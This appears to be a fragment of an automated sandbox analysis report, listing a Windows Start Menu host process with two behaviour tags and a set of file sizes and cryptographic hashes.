C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1768
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
554B
MD587ca8cea5510cfcb42e6674d7aa9ef59
SHA1ef5dd9f0663e769654816e361344133f7d480300
SHA256da777873d645fec9054e02b37c6e156e779e778ef6a5dd27b4a05a40f68b021d
SHA512690c49d82649bb9356f986b903efb17a6998f94f53273876e4da3b621fd2c7c6e32c50f318e86cb7e8d96b24fd953a20d410deb71905d96cb719660931abd800
-
Filesize
6KB
MD539728325879572ffe56a194319f2731f
SHA13898a219352dd3aedc54ff924b01317107c9ce2f
SHA2568e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761
SHA5127d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b
-
Filesize
6KB
MD539728325879572ffe56a194319f2731f
SHA13898a219352dd3aedc54ff924b01317107c9ce2f
SHA2568e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761
SHA5127d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
16KB
MD588026fbea1c7114cd739b1713fcbb1fd
SHA1809534f268838f0bb76ac15fc8a552307fae2de5
SHA256f7bab4f1d238742b43d71f47357cf384e16b2dc858a1662cef7680cfbdb2bd5b
SHA51235a979cbcfb317267ba745172fd2cd47c7596fabd87e03590bf3b9985b294531a79569cf19304e224a76ac487b4dbd3718ca61fffbe37c5cd7510450521e0d0d
-
Filesize
16KB
MD52090cb7c052ba7126e5cabca5fcd486f
SHA1d7581c96065eebea6ef2d623262e3ade610bdf64
SHA256d13e8fa4570cb69cfe39429d386bb886f417dcdf7e967b06955b80c0eb2487c3
SHA512b70f7f484d0af7c6b593226fdcc491b01924a3beedc72620fcdcb87717ed2fc2beeed9d2f8070afbc35b43ffed5d29e2ec28724a8fb7a0ea6f0fad44cfd0ed77
-
Filesize
16KB
MD588026fbea1c7114cd739b1713fcbb1fd
SHA1809534f268838f0bb76ac15fc8a552307fae2de5
SHA256f7bab4f1d238742b43d71f47357cf384e16b2dc858a1662cef7680cfbdb2bd5b
SHA51235a979cbcfb317267ba745172fd2cd47c7596fabd87e03590bf3b9985b294531a79569cf19304e224a76ac487b4dbd3718ca61fffbe37c5cd7510450521e0d0d
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
Filesize13KB
MD55bcc4cf8b3929ef6ed260056e9d5a82f
SHA1a6a72207313a3f8e623ff90f68fe607df13459b5
SHA256c05f26306d75ec2a742d7afe50731d66ee86ac69bb7f11f1a6ee9cb0e4140c63
SHA51201c20cf53b718a51d7c9dfce31f29de1c000d561a33640d5ddc95d5a12064b289ccab4ceb46abd2a402ba08ed96b5b9f28c4860c09185d5995e6142b64042357
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
Filesize14KB
MD521b2bbf10d84abd76d03a7ca01956a3d
SHA14fa413e1555c9f3ce8213911de16658b64f53733
SHA256801d9dbcdca3c2109cca9e5d53fabf77cecdc29ea225811d38f5d6b2dd0bf3f6
SHA512dbb3a0faf5316fd7534525ea33245712675473c1651c9e134df5ad7a1b9fcccb347085af7bc463a9eee936f6516e159a2db6852c3c1ea1199983035d5982d926
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88